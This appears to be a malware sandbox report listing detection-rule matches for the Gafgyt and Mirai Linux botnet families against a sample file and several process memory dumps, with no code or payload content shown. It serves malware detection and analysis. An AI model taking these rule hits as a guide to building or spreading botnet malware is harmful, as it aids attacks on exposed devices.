Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 Author: unknown
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
